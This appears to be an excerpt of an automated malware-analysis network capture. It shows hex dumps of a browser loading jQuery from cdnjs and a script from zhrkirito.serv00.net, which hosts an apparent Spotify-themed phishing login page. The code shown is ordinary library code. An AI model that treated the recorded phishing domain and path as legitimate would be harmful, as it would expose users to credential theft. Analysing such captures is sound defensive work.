                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 64 0a 66 75 6e 63 74 69 6f 6e 20 63 6f 6d 70 6c 65 74 65 64 28 29 20 7b 0a 09 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 20 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 63 6f 6d 70 6c 65 74 65 64 20 29 3b 0a 09 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 20 22 6c 6f 61 64 22 2c 20 63 6f 6d 70 6c 65 74 65 64 20 29 3b 0a 09 6a 51 75 65 72 79 2e 72 65 61 64 79 28 29 3b 0a 7d 0a 0a 2f 2f 20 43 61 74 63 68 20 63 61 73 65 73 20 77 68 65 72 65 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 29 20 69 73 20 63 61 6c 6c 65 64 0a 2f 2f 20 61 66 74 65 72 20 74 68 65 20 62 72 6f 77 73 65 72 20 65 76 65 6e 74 20 68 61 73 20 61 6c 72 65 61 64 79 20 6f 63 63 75 72 72
                                                                                                                      Data Ascii: dfunction completed() {document.removeEventListener( "DOMContentLoaded", completed );window.removeEventListener( "load", completed );jQuery.ready();}// Catch cases where $(document).ready() is called// after the browser event has already occurr
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 32 3b 0a 09 09 6a 51 75 65 72 79 2e 73 74 79 6c 65 28 20 65 6c 65 6d 2c 20 70 72 6f 70 2c 20 69 6e 69 74 69 61 6c 49 6e 55 6e 69 74 20 2b 20 75 6e 69 74 20 29 3b 0a 0a 09 09 2f 2f 20 4d 61 6b 65 20 73 75 72 65 20 77 65 20 75 70 64 61 74 65 20 74 68 65 20 74 77 65 65 6e 20 70 72 6f 70 65 72 74 69 65 73 20 6c 61 74 65 72 20 6f 6e 0a 09 09 76 61 6c 75 65 50 61 72 74 73 20 3d 20 76 61 6c 75 65 50 61 72 74 73 20 7c 7c 20 5b 5d 3b 0a 09 7d 0a 0a 09 69 66 20 28 20 76 61 6c 75 65 50 61 72 74 73 20 29 20 7b 0a 09 09 69 6e 69 74 69 61 6c 49 6e 55 6e 69 74 20 3d 20 2b 69 6e 69 74 69 61 6c 49 6e 55 6e 69 74 20 7c 7c 20 2b 69 6e 69 74 69 61 6c 20 7c 7c 20 30 3b 0a 0a 09 09 2f 2f 20 41 70 70 6c 79 20 72 65 6c 61 74 69 76 65 20 6f 66 66 73 65 74 20 28 2b 3d 2f 2d 3d 29
                                                                                                                      Data Ascii: 2;jQuery.style( elem, prop, initialInUnit + unit );// Make sure we update the tween properties later onvalueParts = valueParts || [];}if ( valueParts ) {initialInUnit = +initialInUnit || +initial || 0;// Apply relative offset (+=/-=)
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 74 68 65 20 6d 61 70 70 65 64 20 74 79 70 65 2c 20 61 6e 64 20 6c 65 74 20 69 74 20 62 61 69 6c 20 69 66 20 64 65 73 69 72 65 64 0a 09 09 69 66 20 28 20 73 70 65 63 69 61 6c 2e 70 72 65 44 69 73 70 61 74 63 68 20 26 26 20 73 70 65 63 69 61 6c 2e 70 72 65 44 69 73 70 61 74 63 68 2e 63 61 6c 6c 28 20 74 68 69 73 2c 20 65 76 65 6e 74 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 44 65 74 65 72 6d 69 6e 65 20 68 61 6e 64 6c 65 72 73 0a 09 09 68 61 6e 64 6c 65 72 51 75 65 75 65 20 3d 20 6a 51 75 65 72 79 2e 65 76 65 6e 74 2e 68 61 6e 64 6c 65 72 73 2e 63 61 6c 6c 28 20 74 68 69 73 2c 20 65 76 65 6e 74 2c 20 68 61 6e 64 6c 65 72 73 20 29 3b 0a 0a 09 09 2f 2f 20 52 75 6e 20 64 65 6c 65 67 61 74
                                                                                                                      Data Ascii: the mapped type, and let it bail if desiredif ( special.preDispatch && special.preDispatch.call( this, event ) === false ) {return;}// Determine handlershandlerQueue = jQuery.event.handlers.call( this, event, handlers );// Run delegat


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.449758104.17.25.144432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:33 UTC380OUTGET /ajax/libs/jquery/3.7.1/jquery.min.js HTTP/1.1
                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:33 UTC966INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:33 GMT
                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                      ETag: W/"64ed75bb-76fe"
                                                                                                                      Last-Modified: Tue, 29 Aug 2023 04:36:11 GMT
                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                      Timing-Allow-Origin: *
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 178290
                                                                                                                      Expires: Fri, 02 Jan 2026 23:23:33 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9%2Br6tohYIxsmblYRWYlyiedGhZ7TmkEdowTkazaK81mFWtqUJxK7jqeQnz0RwDuGRt9P4t%2FLm4M%2BF%2F64cdwNAhY8sDeZ3c41eIazDk%2F74KPxQYCbDSDMF6%2Bj7tBFAneY8c%2FzTSA"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 9010e51ebd737ce8-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      2025-01-12 23:23:33 UTC403INData Raw: 37 62 65 61 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                      Data Ascii: 7bea/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 61 65 3d 6f 65 2e 73 6c 69 63 65 2c 67 3d 6f 65 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 65 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 65 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 73 3d 6f 65 2e 70 75 73 68 2c 73 65 3d 6f 65 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 69 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 75 65 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 6f 3d 75 65 2e 74 6f 53 74 72 69 6e 67 2c 61 3d 6f 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 6c 65 3d 7b 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66
                                                                                                                      Data Ascii: ct.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 20 6e 2e 63 61 6c 6c 28 65 2c 74 2c 65 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 61 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66 69 72 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 63 65 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                      Data Ascii: n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 6e 6f 6e 63 65 7d 2c 6e 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 3b 69 66 28 63 28 65 29 29 7b 66 6f 72 28 6e 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 65 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 22 22 2c 72 3d 30 2c 69 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 21 69 29 77 68 69 6c 65 28 74 3d 65 5b 72 2b 2b 5d 29 6e 2b 3d 63 65 2e 74 65 78 74 28 74 29 3b 72 65 74 75 72 6e 20 31 3d
                                                                                                                      Data Ascii: nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)while(t=e[r++])n+=ce.text(t);return 1=
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 29 3b 63 65 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 6e 7c 7c 21 28 21 6e 7c 7c 31 21 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 65 2e 63 6f 6e 74 61 69 6e 73 3f 65 2e 63 6f 6e 74 61 69 6e 73 28 6e 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 6e 29 29 29 7d 3b 76 61 72 20 66 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 78 38 30 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 22 5c
                                                                                                                      Data Ascii: );ce.contains=function(e,t){var n=t&&t.parentNode;return e===n||!(!n||1!==n.nodeType||!(e.contains?e.contains(n):e.compareDocumentPosition&&16&e.compareDocumentPosition(n)))};var f=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g;function p(e,t){return t?"\
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 67 65 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 67 65 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 67 65 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 66 2b 22 29 24 22 2c 22 69 22 29 2c 6e 65 65 64 73 43 6f 6e 74 65 78 74 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 67 65 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 67 65 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 4e 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65
                                                                                                                      Data Ascii: d|(([+-]|)(\\d*)n|)"+ge+"*(?:([+-]|)"+ge+"*(\\d+)|))"+ge+"*\\)|)","i"),bool:new RegExp("^(?:"+f+")$","i"),needsContext:new RegExp("^"+ge+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+ge+"*((?:-\\d)?\\d*)"+ge+"*\\)|)(?=[^-]|$)","i")},N=/^(?:input|sele
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 64 2e 74 65 73 74 28 74 29 29 29 7b 69 66 28 63 3d 74 2c 66 3d 65 2c 31 3d 3d 3d 70 26 26 28 78 2e 74 65 73 74 28 74 29 7c 7c 6d 2e 74 65 73 74 28 74 29 29 29 7b 28 66 3d 48 2e 74 65 73 74 28 74 29 26 26 55 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 65 26 26 6c 65 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 63 65 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 28 73 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 59 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 51 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d
                                                                                                                      Data Ascii: d.test(t))){if(c=t,f=e,1===p&&(x.test(t)||m.test(t))){(f=H.test(t)&&U(e.parentNode)||e)==e&&le.scope||((s=e.getAttribute("id"))?s=ce.escapeSelector(s):e.setAttribute("id",s=S)),o=(l=Y(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+Q(l[o]);c=l.join(",")}
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 72 3d 28 54 3d 6e 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 43 3d 21 63 65 2e 69 73 58 4d 4c 44 6f 63 28 54 29 2c 69 3d 72 2e 6d 61 74 63 68 65 73 7c 7c 72 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 72 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 2c 72 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 26 26 79 65 21 3d 54 26 26 28 74 3d 54 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 74 2e 74 6f 70 21 3d 3d 74 26 26 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 4d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3d 24 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e
                                                                                                                      Data Ascii: ocumentElement&&(r=(T=n).documentElement,C=!ce.isXMLDoc(T),i=r.matches||r.webkitMatchesSelector||r.msMatchesSelector,r.msMatchesSelector&&ye!=T&&(t=T.defaultView)&&t.top!==t&&t.addEventListener("unload",M),le.getById=$(function(e){return r.appendChild(e).
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 43 29 72 65 74 75 72 6e 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 65 29 7d 2c 64 3d 5b 5d 2c 24 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 53 2b 22 27 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 69 64 3d 27 22 2b 53 2b 22 2d 5c 72 5c 5c 27 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 65 2e 71 75 65
                                                                                                                      Data Ascii: of t.getElementsByClassName&&C)return t.getElementsByClassName(e)},d=[],$(function(e){var t;r.appendChild(e).innerHTML="<a id='"+S+"' href='' disabled='disabled'></a><select id='"+S+"-\r\\' disabled='disabled'><option selected=''></option></select>",e.que
                                                                                                                      2025-01-12 23:23:33 UTC1369INData Raw: 49 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 56 28 65 29 2c 43 26 26 21 68 5b 74 2b 22 20 22 5d 26 26 28 21 64 7c 7c 21 64 2e 74 65 73 74 28 74 29 29 29 74 72 79 7b 76 61 72 20 6e 3d 69 2e 63 61 6c 6c 28 65 2c 74 29 3b 69 66 28 6e 7c 7c 6c 65 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 7c 7c 65 2e 64 6f 63 75 6d 65 6e 74 26 26 31 31 21 3d 3d 65 2e 64 6f 63 75 6d 65 6e 74 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 65 29 7b 68 28 74 2c 21 30 29 7d 72 65 74 75 72 6e 20 30 3c 49 28 74 2c 54 2c 6e 75 6c 6c 2c 5b 65 5d 29 2e 6c 65 6e 67 74 68 7d 2c 49 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 65 2e 6f 77 6e 65
                                                                                                                      Data Ascii: I.matchesSelector=function(e,t){if(V(e),C&&!h[t+" "]&&(!d||!d.test(t)))try{var n=i.call(e,t);if(n||le.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(e){h(t,!0)}return 0<I(t,T,null,[e]).length},I.contains=function(e,t){return(e.owne


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.449759128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:33 UTC581OUTGET /spotify/app/auth/res/jquery.js HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://zhrkirito.serv00.net/spotify/app/auth/login.php
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:34 UTC244INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:34 GMT
                                                                                                                      Content-Type: application/javascript
                                                                                                                      Content-Length: 369177
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-5a219"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:34 UTC16140INData Raw: 2f 2f 20 2f 2f 20 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 28 65 2c 65 2e 65 78 70 6f 72 74 73 29 2c 65 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72
                                                                                                                      Data Ascii: // // !function(){var t="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(t){var e={exports:{}};return t(e,e.exports),e.exports}var r=function(t){retur
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 74 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 21 65 29 72 65 74 75 72 6e 21 31 3b 69 28 74 29 7d 72 65 74 75 72 6e 20 74 5b 72 5d 2e 77 65 61 6b 44 61 74 61 7d 2c 6f 6e 46 72 65 65 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4d 72 26 26 61 2e 52 45 51 55 49 52 45 44 26 26 6f 28 74 29 26 26 21 77 28 74 2c 72 29 26 26 69 28 74 29 2c 74 7d 7d 3b 48 5b 72 5d 3d 21 30 7d 29 2c 4e 72 3d 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 68 69 73 2e 73 74 6f 70 70 65 64 3d 74 2c 74 68 69 73 2e 72 65 73 75 6c 74 3d 65 7d 2c 72 3d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 6f 2c 69 29 7b 76 61 72 20 61 2c 75 2c 73 2c 63 2c 66 2c 6c 2c 68 2c 70 3d 74 65 28 72
                                                                                                                      Data Ascii: t))return!0;if(!e)return!1;i(t)}return t[r].weakData},onFreeze:function(t){return Mr&&a.REQUIRED&&o(t)&&!w(t,r)&&i(t),t}};H[r]=!0}),Nr=e(function(t){var e=function(t,e){this.stopped=t,this.result=e},r=t.exports=function(t,r,n,o,i){var a,u,s,c,f,l,h,p=te(r
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 28 6f 2e 70 72 6f 74 6f 74 79 70 65 2c 72 3f 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 69 28 74 68 69 73 29 3b 69 66 28 79 28 74 29 29 7b 76 61 72 20 72 3d 66 6f 28 74 29 3b 72 65 74 75 72 6e 21 30 3d 3d 3d 72 3f 79 6f 28 65 29 2e 67 65 74 28 74 29 3a 72 3f 72 5b 65 2e 69 64 5d 3a 76 6f 69 64 20 30 7d 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 61 28 74 68 69 73 2c 74 2c 65 29 7d 7d 3a 7b 61 64 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 28 74 68 69 73 2c 74 2c 21 30 29 7d 7d 29 2c 6f 7d 7d 2c 53 6f 3d 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 65 74 2e 65 6e 66 6f 72 63 65 2c 6f 3d 21 6e 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 26 26 22 41 63 74
                                                                                                                      Data Ascii: (o.prototype,r?{get:function(t){var e=i(this);if(y(t)){var r=fo(t);return!0===r?yo(e).get(t):r?r[e.id]:void 0}},set:function(t,e){return a(this,t,e)}}:{add:function(t){return a(this,t,!0)}}),o}},So=e(function(t){var e,r=et.enforce,o=!n.ActiveXObject&&"Act
